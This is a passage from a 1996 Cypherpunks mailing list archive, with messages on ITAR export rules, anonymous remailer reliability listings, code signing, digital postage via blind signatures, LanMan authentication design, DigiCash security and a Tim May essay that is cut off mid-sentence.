From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 22 Jan 96 03:38:38 PST
To: Cypherpunks <perry@piermont.com
Subject: Re: ITAR and hash functions (Perry's question)
In-Reply-To: <199601201534.KAA03043@jekyll.piermont.com>
Message-ID: <m0teKcP-0004LiC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: 
: Phil Karn writes:
: > Perry quoted part of the joint declaration of facts in my case and asked
: > 
: > >Would this not mean that the government is estopped from ever again
: > >claiming that hash functions are export controlled under the ITAR?
: > 
: > Not according to them.
: 
: Yeah, I know not according to them. Thats not what counts. 

But that is what counts initially

: I'd like to
: know what a lawyer thinks. Once they have declared that something
: doesn't fit the munitions criteria I suspect they are estopped from
: ever claiming again that it is munitions -- basic legal
: principle. Sure, they can claim otherwise, but they aren't forbidden
: by law from asserting their power to make buildings levitate, either.
 
In general, the doctrine of estoppel is not applied against
governmental agencies.  To the extent that an agency is purportedly
making decisions as to what the law is, it may or may not be bound by
its earlier decisions, but it usually won't be.  And it is not bound
by its factual determinations.

: > Furthermore, they repeatedly assert that under the power delegated to
: > them by the President, they have the absolute power to add and delete
: > items from the Munitions List and to make inexplicable, inconsistent
: > and arbitrary rulings whenever they damn well feel like it, and no
: > court can overrule them.
: 
: They can claim that they have the right to declare fingernail clippers
: to be munitions, but that certainly couldn't stand up in court.

That would stand up in court and in any case the statute that is the
basis for the ITAR says that the determination that
something--including fingernail clippers--is on the Munitions Lists is
not reviewable by the courts.  (And a court held before that provision
was passed that the question of whether commercial television
descramblers were properly on the munitions list, as cryptographic
devices, was a political question that could not be reviewed by the
court.  And that was, as I recall, a criminal case.)

: > So the bottom line is this: at the moment the ODTC will let you export
: > hash functions as long as they don't encrypt data. They'll probably
: > grant CJ requests to that effect. But they could change their minds at
: > any time if they feel like it.
: > 
: > Isn't it wonderful to live under a government of laws, not of men?

I am convinced that most, if not all, the restrictions in the ITAR on
disclosing cryptographic software will be struck down by the courts as
being unconstitutional under the first amendment, but it will not be
an easy process.  There are all sorts of constitutional provisions
that are violated every day and though some of these violations will
be overturned by courts, if and only if someone like Phil Karn
challenges them in court, but the wheels of the law grind slowly.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 22 Jan 96 06:59:32 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199601221458.GAA13304@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 22 Jan 96 6:49:09 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
c2       remail@c2.org                    *******+**+*    16:05 100.00%
ecafe    cpunk@remail.ecafe.org           ######*#####    28:53  99.99%
pamphlet pamphlet@idiom.com               ++++++++-+++    53:51  99.99%
vishnu   mixmaster@vishnu.alias.net       *******+****    15:49  99.98%
flame    remailer@flame.alias.net         +++++..++-+*  2:48:04  99.96%
alpha    alias@alpha.c2.org                      #****     3:24  99.96%
tjava    remailer@tjava.com               ##+#-#*** ##    11:04  99.69%
mix      mixmaster@remail.obscura.com     -----------   1:41:10  99.58%
rmadillo remailer@armadillo.com           ##+#*###  ##      :57  99.39%
portal   hfinney@shell.portal.com         #*+++*-*## #     4:56  99.29%
alumni   hal@alumni.caltech.edu           *+****+*#+ #     4:35  99.23%
extropia remail@extropia.wimsey.com       ----__....-  18:15:09  98.38%
hroller  hroller@c2.org                   -#  ########     1:11  97.93%
penet    anon@anon.penet.fi               ------..  -  15:40:28  92.22%
rahul    homer@rahul.net                  * ##*#**+***     1:30  99.87%
shinobi  remailer@shinobi.alias.net       .-     + #+#  8:52:40  79.39%
ford     remailer@bi-node.zerberus.de     *++++++-+     2:30:08  63.32%
bsu-cs   nowhere@bsu-cs.bsu.edu           *---*##*         8:49  56.61%
replay   remailer@replay.com              **** *+          6:03  41.80%
hacktic  remailer@utopia.hacktic.nl       *******          8:05  41.23%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 21 Jan 96 23:19:00 PST
To: cypherpunks@toad.com
Subject: Microsoft to digitally certify other manufacturers' code?
Message-ID: <199601220718.XAA12594@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This is old news, but I don't remember it being brought up. This is
interesting in light of recent discussions regarding the CryptoAPI,
the uncertainty of Microsoft's support for Java (it won't be in
Internet Explorer 3.0, but Visual Basic will), and Microsoft's
Internet Developers' conference scheduled for mid-March.

One of a set of press releases on http://www.microsoft.com/internet/

I thought I remembered seeing an announcement of Microsoft's plans
to license Java there before, but it's not there. I know they've
revised press releases without changing the date before (most notably
the October 20th SMB security bug acknowledgement).

>                                                          [Microsoft]
>          Microsoft Announces Internet Code Safety Initiative
> Microsoft Previews Internet Digital Signature Initiative to 150 ISVs
> 
> REDMOND, Wash. - Dec. 7, 1995 -At the Internet Control Developers'
> Workshop on December 6, Microsoft Corporation proposed to the top
> 150 software companies in the world, an Internet digital signature
> initiative which provides a safer environment for executable code on
> the Internet. To address concerns about potentially malicious code
> or viruses, this technology will enable users to verify that a
> program's integrity is free of third-party tampering. Browsers such
> as Microsoft Internet Explorer will be equipped with the ability to
> automatically download applications from a list of vendors approved
> by the user. If the author is not on the user's pre-approved list,
> the browser can display the signature of the executable code and
> allow users to make an informed decision on whether to proceed with
> the download.
> 
> Microsoft plans to propose the Internet digital signature
> specifications to the W3 Consortium (W3C) and the Internet
> Engineering Task Force (IETF) as an open Internet standard. The
> technology will be an open, proposed specification available to the
> entire Internet community. In addition, as part of the Open Process
> Design Review, Microsoft will host a digital signature design
> preview in January to solicit feedback from the Internet community.
> 
> Ken Wasch, president of the Software Publishers' Association (SPA)
> said "The Software Publisher's Association applauds this important
> initiative. Independent software publishers large and small will
> have greater business opportunities publishing powerful software
> with this mechanism. Users will buy more signed software over the
> Internet because it will be more powerful and users will have
> confidence in the accountability of its creator."
> 
> "Digital signatures allow people to interact over the Internet with
> the same confidence that they interact with each other in everyday
> life," said Bob Atkinson, digital signature architect. "A reliable
> accountability mechanism like this allows users to avoid walking
> around in a virtual suit of armor, giving users the flexibility to
> download and run the most powerful and interesting programs without
> undo fear of anonymous computer vandalism."
> 
> Founded in 1975, Microsoft (NASDAQ "MSFT") is the worldwide leader
> in software for personal computers. The company offers a wide range
> of products and services for business and personal use, each
> designed with the mission of making it easier and more enjoyable for
> people to take advantage of the full power of personal computing
> every day.
> 
> Microsoft is either a registered trademark or trademark of Microsoft
> Corporation in the United States and/ or other countries.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Mon, 22 Jan 96 05:13:29 PST
To: jhupp@novellnet.gensys.com>
Subject: Re: new web security product
In-Reply-To: <199601161948.OAA02322@jekyll.piermont.com>
Message-ID: <sl0sorKMc50e81VTgl@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp writes:
> : > I wouldn't pass this along normally, but it seems to allow folks to use
> : > their credit cards at home securely.  Bye-bye, First Virtual... ;)

Perry Metzger writes:
> : I don't think its going to fly. No one wants to pay for an unneeded
> : $100 piece of hardware to encrypt the same credit card over and over
> : again, when a nearly zero marginal cost piece of software can do the
> : same thing.

Jeff Hupp writes:
> 	I am not even sure it IS an encryption device. ......
> 	It may just be a low cost? mag stripe reader...

Let's assume that it is an encryption device, though I agree that this
is left unclear.  This is by no means the first announcement of such a
device.  I suspect it is targeted at physical merchants, and intended
more to compete with the likes of Verifone terminals than anything else.
 I doubt that anyone's basing their business plan on the idea that
consumers will spend $100 each for a device that helps them to spend
more money, but has no other direct utility.   -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com> (FAQ & PGP key: nsb+faq@nsb.fv.com)
Chief Scientist, First Virtual Holdings

VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 22 Jan 96 05:31:27 PST
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Microsoft to digitally certify other manufacturers' code?
In-Reply-To: <199601220718.XAA12594@Networking.Stanford.EDU>
Message-ID: <199601221331.IAA17057@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  The question is, if Microsoft is proposing this to the W3C and IETF, will
they provide a reference implementation with source freely available? Microsoft
has a habit of proposing "open" standards, of which they have the only 
implementation, which quickly becomes a defacto standard along with
any "extensions" they make.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 22 Jan 96 09:59:27 PST
To: cypherpunks@toad.com
Subject: More thoughts about digital postage (was Re: Digital postage and remailer abuse)
In-Reply-To: <v02120d02ad1ce02500bc@[192.0.2.1]>
Message-ID: <T67Ax8m9LMNe085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

People asked in earlier in this thread how remailers could issue digital
postage stamps without being able to know who is using which stamp issued.

One obvious approach is to use blind signatures.  Rather than issuing
a stamp to the user who requests/purchases it, the user could send
an unsigned stamp, encrypted in an RSA envelope, to the remailer.  The
remailer would then blind-sign the envelope and return it to the user.
The user then decrypts the envelope and has a stamp ready for use.

At the time of use, the remailer checks the signature.  If it is valid,
it checks to see if the stamp has been used before.  If so, it forwards
the message to /dev/null; if not, it records the stamp (or perhaps a
hash of the stamp) in its database.

How does the remailer know that it is signing a stamp rather than (say)
money orders, or a confession of sending kiddy porn over the net?  The
textbook answer is to use a cut-and-choose protocol -- which requires
some subsequent communication with the user.  But I'm not convinced that
this is necessary. If the remailer's postage key is used only for
postage and known to be used only for postage, then tricking it into
signing something else would have the same significance as "signing" a
paper check with the Pitney-Bowes postage meter.

I'm assuming that the postage stamp would look something like:

- -----BEGIN POSTAGE STAMP-----

Kibo's remailer <remailer@happy.net> 3FA610092DB3FE12554AE98F66705601

- -----END POSTAGE STAMP-----

where the random bits are generated by the user prior to submission to
the remailer.  (Actually its appearance would be
implementation-dependent, of course.)

This is all cryptology 101, of course, but hey, it's a start.

- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMQPF+uVevBgtmhnpAQEgAQL/aYgGUvvW4jTLSnqxheid006I85sUdk2H
l4GxtjW7obMI8rZ0c4kEYsXHnbDyFaREOpSjhSDzeqV2pkogesea0j/xXRqM7UQ3
hG5NBc56Nhr78+hqIOuyo3t6RaRjXi75
=qYXn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Mon, 22 Jan 96 09:40:05 PST
To: cypherpunks@toad.com
Subject: An IDEA whose time has come (Notes from the RSA Conference)
Message-ID: <v02120d01ad297b95a32c@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


Well the RSA Security Conference is over, and I finally had time to sleep.
Thus, I'll give you all a bit of my impressions.

First, there were a heck of a lot more merchants this year. Last year, there
were about 400 people. This year it was 1100, with a couple hundred waiting.
Thus the conferences were a bit more mixed in level of topic. (As one
person put it, the more interesting the title, the more likely it is a
blatant plug for a product.) On the other hand there were a number of great
conferences too. Sadly, I was busy at the Consensus booth and didn't have
time for many of them.

Last year Clipper was the big issue, but export controls were predicted to
be the big issue this year.

This year export controls were the big issue, but certificates were
predicted to be the big issue next year.

Lotus got low marks in everyone's book for setting the precedent of giving
the government 24 bits of their key. (As if France is going to be satisfied
with that solution.)

I didn't meet many Cypherpunks at this conference. Partially it may have
been because I was dirt tired after planning the booth in only two weeks,
and running it.

They had a lot of nice giveaways. I have a metal backed dayrunner which is
cute, an etch-a-sketch keychain which is causing rabid jealousy in the
office, and a nifty t-shirt with the logo 'A good marketing organization
listens to its customers'... then the picture of a woman on the phone w/
two spooks listening in.. finally 'We Hear You... Your NSA'.

Needless to say, I like it.

Anyway here is the point of the subject from this message. A while back I
asked for all your wish lists. One of the big issues was making IDEA
available w/ RSAREF. Well, I did even better, you can now license IDEA from
Consensus whether you use RSAREF or not. This was the biggest hit at our
booth. A number of groups saw a very strong, fast, Swiss block cypher as a
nifty thing. Imagine, you can use 128 bits in Europe. Right now I'm trying
to convince Ascom to develop a
crippled version of IDEA to simply give away if anyone wants it for export.
(Like most of the folk here, I don't see a 40 bit key as very valuable, but
it
is useful for companies which don't have contacts in Europe.)

As a little promo, Ascom, the company which developed IDEA, and will be
licensing it in Europe, announced a challenge. If you can break one
ciphered
message in the next year, they'll send you on a vacation to the Matterhorn,
give you a nice dinner w/ the creators of IDEA, and be really impressed. :)

Anyway, I'll be putting more information up on our web pages about IDEA.

If anyone wants info on my Etch-A-Sketch keychain, feel free to send me some
mail. If you want info on anything else, you can send email for that too.

Take care all.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 22 Jan 96 10:36:02 PST
To: "Roy M. Silvernail" <roy@sendai.cybrspc.mn.org>
Subject: Re: (none)
In-Reply-To: <960122.061235.3y2.rnr.w165w@sendai.cybrspc.mn.org>
Message-ID: <Pine.SOL.3.91.960122103704.6658B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jan 1996, Roy M. Silvernail wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> > Note that RSA normally is used as probabilistic encryption: encrypt the
> > same plaintext twice, and you'll likely get two different ciphertexts.
> 
> I think you're confusing PGP's use of random session keys and random
> padding with actual RSA encryption.  Using RSA alone on a given
> plaintext will always give you the same ciphertext.

RSA used in a raw mode will always give the same plaintext for the same 
cyphertext; however most uses of RSA use (or at least should use) PKCS1 
random padding - thus the plaintext passed to RSA will be different each 
time.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 22 Jan 96 07:51:17 PST
To: cypherpunks@toad.com
Subject: NSC_lub
Message-ID: <199601221551.KAA17313@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-22-96. W$J:

   "VeriFone and Netscape Plan Software To Ease Internet
   Credit-Card Payments."

      They aim to simplify payments with software for both
      banks and merchants. The bank software would allow banks
      to use their existing computer systems to read and
      process transactions. The merchant software would allow
      merchants to buy just one software package to put up an
      electronic storefront and payment system on the Web.

      Netscape said the software will include a new encryption
      technology that Visa and MasterCard are expected to
      announce in two to three weeks. That technology would
      break sensitive information into 1,024 bits instead of
      the 128 bits used currently.


   "AOL, Netscape Are Discussing An Alliance."

      Netscape and America Online Inc. are in talks to forge
      an alliance aimed at furthering their lead over the
      on-line push by software giant Microsoft Corp. "If you
      can't beat 'em, unguent 'em," Case-squirted an a-oiler.


   NSC_lub












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Mon, 22 Jan 96 09:06:32 PST
To: cypherpunks@toad.com
Subject: Re: NSA vacuuming down Internet traffic
Message-ID: <199601221707.LAA12234@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


alanh@infi.net (Alan Horowitz) asks:

>Is there any open source - or otherwise - knowledge or speculation about
>which words/phrases the Terra-cycle cpu's are text-searching *for*?  If it
>were your responsibility to eavesdrop on Iranian terrorists ...
>... would you know for sure which words/phrases to key on?   It 
>doesn't sound like a tractable problem to me.

There are two parts to this question. 

First, how do you choose targets?  It's been a few years since I read
Bamford's book (when *is* the next edition coming out, anyway?) but I
seem to remember that there is some sort of "committee" that agrees on
what to aim at. It probably contains the usual collection of
bureaucrats from military and civilian agencies. Despite the lofty
budgets, even the NSA's vacuum cleaner has a hose of limited size. The
committee allocates the available resources to prioritized objectives.
You can probably predict targets by estimating political priorities
and clout of the various agencies, and, of course, by watching CNN.

Second, how do you ensure that you capture relevant traffic? I'm sure
you start with the obvious -- look at traffic that's definitely
relevant and set up filters to find more of it. While it's attractive
to want to treat this as a state detection problem (message is/isn't
relevant) you really want more of a signal analysis solution (measure
likelihood of relevance). Also, a high priority target would probably
have its hit behavior evaluated by real humans to ensure that the
expected amount of relevant traffic is continuously sucked up.

My first job, twenty years ago, involved a prototype speech
recognition system under contract for Rome Air Development Center (a
traditional cover for TLA research). The machine was supposed to go
beep whenever a specified word or phrase was heard over the input
voice stream. We joked about testing for the term "Russian Spy" but
settled on looking for "Kissinger" instead. That let us run tests by
listening to news broadcasts of the time. We built custom boards with
Schottky TTL and a blazing fast 120ns cycle time. Times change, eh?

Rick.
smith@sctc.com            secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 22 Jan 96 08:18:27 PST
To: cypherpunks@toad.com
Subject: NYT New Web Site
Message-ID: <199601221618.LAA19733@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT reported today that it has set up a new web site: 
http://www.nytimes.com


It offers most of the daily articles as well as some from 
archives. More info on subscription and the offerings at the 
home page.


Subscription is free, for now. Though there is a charge for 
downloading, and a battery of whistling-in-the-dark copyright 
proclamations and threats and pleadings.


For the Times-addicted, today's WSJ has a page one article on 
NYT-leadership squabbling, fomented by board member Gerstner, 
infamous IBM-Lotus espionage-enabler.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lws@transarc.com
Date: Mon, 22 Jan 96 08:21:38 PST
To: beaver@transarc.com
Subject: Lan Manager security
Message-ID: <9601221620.AA11356@capybara.transarc.com>
MIME-Version: 1.0
Content-Type: text/plain



Have you seen an analysis of the security of the LanMan 
authentication scheme?  It strikes me as better than K4, but worse 
than K5.  I wonder if you concur.

Since Don and Ted have probably not seen this before, here's the 
technique as I understand it (summarized from the SAMBA docs).

The password is uppercased and truncated to 14 bytes (or padded to 14 
bytes with nulls).  This is split (0..6,7..13) into two DES keys 
which are each used to encrypt a static 8-byte value. The resulting 
16 byte key is stored at the server. 

To authenticate a connection, the server issues an 8 byte random 
challenge.
I presume this is returned in the clear since the docs don't specify 
otherwise, but I haven't sniffed one.  The randomness of the 
challenge doesn't matter so much if it crosses the network in the 
clear (though I can't understand why they did this), as long as the 
period of the generator is large enough to prevent replay attacks.

The client then pads the 16-byte key to 21 bytes (with zeros, natch), 
splits it in thirds, {0..6}, {7..13}, {14,15,NUL,NUL,NUL,NUL,NUL}, 
uses each third to DES-encrypt the challenge, concatenates the 
ciphertexts, and returns the response to the server.

I don't want to prejudice you too much by posting my own thoughts on 
this protocol, but here are a couple of things that should be obvious:
1. It doesn't hand back free samples of enciphered known plaintexts 
to all comers for offline attack.  This is a Good Thing, unlike some 
other NOTABLE EXAMPLES.
2. This business with padding the keys out with zero bits really 
simplifies cryptanalysis.  Where my limited expertise breaks down, is 
identifying just how easy it makes things.
3.  I'm kind of boggled as to why they do this multiple encryption of 
things and then *concatenate* the ciphertexts.  If you're going to do 
multiple encryption, it seems to make sense to pipeline the stages.  
Doesn't it?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 22 Jan 96 08:16:47 PST
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: Why is blowfish so slow?  Other fast algorithms?
In-Reply-To: <199601220700.CAA13713@amsterdam.lcs.mit.edu>
Message-ID: <199601221620.LAA20745@homeport.org>
MIME-Version: 1.0
Content-Type: text


David Mazieres wrote:

| First, can someone tell me if the latest version of blowfish (the one
| in Applied Crypto 2nd edition) is available online somewhere?  I
| looked at a bunch of crypto ftp servers and could only find an older
| version of blowfish that did not have the blf_ctx structure allowing
| multiple keys to be active at a time.

Did you check ftp.dsi.unimi.it?  I seem to remember them having the
latest source right after Crypto95.  Also, ftp.csua.berkeley.edu
should have it.  (Their code is version 1.3; do you know what version
you're after?)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 22 Jan 96 10:26:35 PST
To: "Marcel van der Peijl" <bigmac@digicash.com>
Subject: DigiCash Ecash - 2 security topics
In-Reply-To: <199601221635.RAA13080@digicash.com>
Message-ID: <199601221826.LAA04610@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Marcel van der Peijl"
 <bigmac@digicash.com> is alleged to have written:
> 
> 

(I wrote:)

> > E.g. has there been a DigiCash response to Ian Goldberg's
> > publication of a denial-of-service attack which operates by 
> > spending a coin with the same serial number as your victim's 
> > coin?
> After discussing things with Ian we came up with several solutions. 
> One is encrypting more messages (which we will do in a next revision 
> of the protocol), the other is enabling ecash to work over ssl 
> servers. You may not see the answer directly in the list, but you 
> will see it in the next protocol revision.


What kind of performance hit does this new encryption entail?
(No additional performance hit if SSL does it, I know.)
Are you considering having different protocols for SSL-protected
transactions versus unprotected ones?


Let me repeat something I said a couple of weeks ago:  I suspect
that the weakest point in DigiCash security is on the end-user's
own harddrive.  A malicious cracker could write a Trojan horse
or even a virus which would steal the user's coins and send them
to himself.


Hm.  Now that I think about it, if the user has a back-up copy
of those coins then he can reveal their blinding factors to the
bank after the theft, thus catching the thief!  So the thief
program would have to deposit those coins with the bank, make a
new withdrawal (ouch!) and then steal the new coins.


I'm not sure that anything can be done by DigiCash or by Ecash-
issuing banks to prevent this, but I thought I'd mention it.


(Hm.  The program also has to steal the user's password in order
to make the withdrawal..  This is getting to be a pretty smart
program!)


Regards,

Bryce
                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash     
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMQPWs/WZSllhfG25AQHv2gQAuJsZqQh+IF0vk8C2OY9zsvMlbqN0+GxN
LinbZhWRDlqcRJ69dtzYDhbuvDphHuQYdNUJka5r3Bzplj5tim3sJ+wvEF2eiXTO
vUSXrJ8DvnZPji+qEuv1Zs5D8gXdFs2ALsUbsDxQxVrVlcTbDKnz2EQel0apzqld
VTV8CFvHaRY=
=i3hX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Jan 96 10:23:44 PST
To: cypherpunks@toad.com
Subject: The Collapse of Ideas in a Pop Culture
Message-ID: <ad2914530a021004e9eb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Someone sent me a note asking about my recent comment that I no longer read
"Wired." I replied to him by citing the trendy, busy,
information-overloaded, and personality-oriented nature of "Wired"...and
its dozen or so direct competitors, mostly GenX rags, plus the several
dozen or so tangentially similar magazines that fill shelf after shelf in
the Barnes and Noble and Supercrown sorts of superstores.

Here's what I said to him:

---

And "Wired" is frustratingly repetitive, trendy, over-busy with graphics,
sidebars, etc. And the mine of good topics is being mined by several dozen
other mags, such as Access, RayGun, Mondo, Details, etc. etc. Many of these
are aimed at GenXers, with an explicit focus on personalities rather than
ideas.

(How many of these mags have had Traci Lords on the cover, for example?)

I grew up with "Scientific American" as my standard: long, detailed
articles. (And even their articles are getting shorter and more
pop-oriented.)

---

The Cypherpunks relevance, I think, is that many of the ideas we espouse
just cannot easily be covered in a "personality" piece, or in a "freak of
the week" (to paraphrase Dave Mandl) photo shoot. Journalists who want
"some quick shots" of "Cypherpunks talking about privacy" do a disservice
to the deeper ideas.

To be fair to journalism, I think several journalists--whose names I have
mentioned before, but won't here--do a fine job of in-depth reporting. They
are the Jules Bergmanns of our modern age. (If you don't know who Jules
Bergmann was, you're a GenXer and can't be held responsible for your
ignorance :-}.)

There is some hope. When people ask questions about what terms mean, about
where to find more information, we don't refer them to articles in "Access"
about how former porn queen is really big on PGP, or squibs in "Interview"
about how Seattle's java houses are going apeshit over Java....we refer
them to "Applied Cryptography," to "The Puzzle Palace," and even to
articles on digital cash in "Scientific American."

I wander through the cavernous bookstores that are so common these days,
